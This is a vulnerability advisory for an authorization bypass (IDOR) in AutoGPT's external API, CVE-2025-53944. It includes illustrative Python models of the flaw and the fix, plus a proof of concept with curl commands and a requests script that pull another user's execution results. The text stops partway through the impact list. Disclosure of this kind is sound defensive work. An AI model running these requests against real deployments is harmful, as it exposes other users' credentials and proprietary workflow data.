CVE-2025-53944 | CVSS 7.7 (High)

CVE-2025-53944: AutoGPT Authorization Bypass in Graph Execution External API

Authorization bypass vulnerability in AutoGPT's external API allowing authenticated users to access execution results from other users' graph executions.

Gecko Security Research
Gecko Security Team
1/15/2025

Description

There is an authorization bypass vulnerability in the external API that allows authenticated users to access execution results from other users' graph executions. The vulnerability exists in the get_graph_execution_results endpoint, which validates that the requesting user can access the specified graph but fails to validate ownership of the execution ID parameter.

The endpoint performs proper authorization for the graph_id parameter by calling get_graph() with the authenticated user's ID, ensuring the user owns or has access to the graph. However, it then directly queries execution data using the user-supplied graph_exec_id without validating that this execution belongs to the authorized graph or the requesting user. Notably, the internal API endpoint /graphs/{graph_id}/executions/{graph_exec_id} implements the correct authorization pattern, performing both execution ownership validation and graph relationship verification.
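The following minimal, self-contained Python sketch models this data flow. The function and field names mirror the advisory, but the in-memory data layer and bodies are illustrative assumptions, not AutoGPT's actual handlers or database models.

# Illustrative model of the flaw -- not the actual AutoGPT source.
GRAPHS = {
    "graph-attacker": {"owner": "attacker"},
    "graph-victim": {"owner": "victim"},
}
EXECUTIONS = {
    "victim-exec-uuid": {
        "graph_id": "graph-victim",
        "user_id": "victim",
        "inputs": {"OPENAI_API_KEY": "sk-victim-secret"},
    },
}

def get_graph(graph_id, user_id):
    # Stand-in for graph_db.get_graph(): returns the graph only if the caller owns it.
    graph = GRAPHS.get(graph_id)
    return graph if graph and graph["owner"] == user_id else None

def get_graph_execution_results(graph_id, graph_exec_id, user_id):
    # Stand-in for the vulnerable external endpoint: the graph is authorized,
    # but the execution ID is used exactly as supplied by the caller.
    if get_graph(graph_id, user_id) is None:
        raise PermissionError("graph not accessible")
    return EXECUTIONS.get(graph_exec_id)  # missing ownership/relationship check (the IDOR)

# The attacker authorizes against their own graph, then reads the victim's execution:
print(get_graph_execution_results("graph-attacker", "victim-exec-uuid", "attacker"))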

This IDOR vulnerability allows attackers to access sensitive execution data including input parameters (potentially containing API keys and credentials), output results, and proprietary workflow logic from any user's graph executions, provided they can discover the target execution UUID.

Source-to-Sink Analysis

Source: User-controlled graph_exec_id parameter in URL path /graphs/{graph_id}/executions/{graph_exec_id}/results

Call Chain:

  1. get_graph_execution_results() function in autogpt_platform/backend/backend/server/external/routes/v1.py:115 processes external API request
  2. graph_db.get_graph(graph_id, user_id=api_key.user_id) validates user access to graph_id (authorization passes for attacker's graph)
  3. execution_db.get_node_executions(graph_exec_id) called with user-controlled execution ID at line 123
  4. Database query in get_node_executions() at autogpt_platform/backend/backend/data/execution.py:728 with where clause {"agentGraphExecutionId": graph_exec_id} - no user or graph validation (contrast with the guard sketch after this list)
  5. NodeExecutionResult.from_db(execution) constructs result objects containing victim's execution data
  6. Sink: Response construction returns unauthorized execution data including victim's input parameters, output results, and workflow details in GraphExecutionResult structure
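For contrast, the sketch below expresses the guard that the internal endpoint applies and the external route omits: the execution must belong to both the requesting user and the authorized graph. The helper name and dictionary shape are assumptions for illustration, not the actual patch.

def execution_is_authorized(execution, graph_id, user_id):
    # An execution may be returned only if it exists, belongs to the requesting
    # user, and was produced by the graph authorized earlier in the request.
    return (
        execution is not None
        and execution.get("user_id") == user_id
        and execution.get("graph_id") == graph_id
    )

# The victim's execution is rejected even though the attacker's graph_id
# passed the earlier get_graph() check:
victim_exec = {"user_id": "victim", "graph_id": "graph-victim"}
assert not execution_is_authorized(victim_exec, "graph-attacker", "attacker")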

Proof of Concept

Prerequisites:

  • Valid API key with READ_GRAPH permission
  • Access to at least one graph (own graph or public graph)
  • Discovery of victim's execution UUID (through logs, error messages, etc.)

Attack steps:

  1. Obtain a valid API key: curl -X POST "https://platform.autogpt.co/api/api-keys" -H "Content-Type: application/json" -d '{"name":"test","permissions":["READ_GRAPH"]}'
  2. Discover victim execution ID through side channels or enumeration
  3. Execute attack:
curl -X GET \
  "https://platform.autogpt.co/api/graphs/ATTACKER_GRAPH_ID/executions/VICTIM_EXECUTION_UUID/results" \
  -H "X-API-Key: ATTACKER_API_KEY"

Result: The server validates the attacker's access to ATTACKER_GRAPH_ID (which succeeds) but returns the execution data for VICTIM_EXECUTION_UUID, including sensitive input/output data, API keys, and proprietary workflow information.
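The same request can be scripted as shown below. The base URL, key, and IDs are placeholders to be filled in by the tester; only the request shape comes from the advisory.

import requests

# Placeholders (assumptions) -- substitute real values before running.
BASE_URL = "https://platform.autogpt.co/api"
ATTACKER_API_KEY = "ATTACKER_API_KEY"            # key holding READ_GRAPH permission
ATTACKER_GRAPH_ID = "ATTACKER_GRAPH_ID"          # any graph the attacker can access
VICTIM_EXECUTION_UUID = "VICTIM_EXECUTION_UUID"  # discovered out of band

resp = requests.get(
    f"{BASE_URL}/graphs/{ATTACKER_GRAPH_ID}/executions/{VICTIM_EXECUTION_UUID}/results",
    headers={"X-API-Key": ATTACKER_API_KEY},
    timeout=30,
)

# A 200 response containing the victim's node inputs/outputs (rather than a
# 403/404) confirms the execution was returned without an ownership check.
print(resp.status_code)
print(resp.json() if resp.ok else resp.text)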

Impact

  • Cross-tenant data access in multi-tenant SaaS environment
  • Exposure of API keys and credentials stored in execution inputs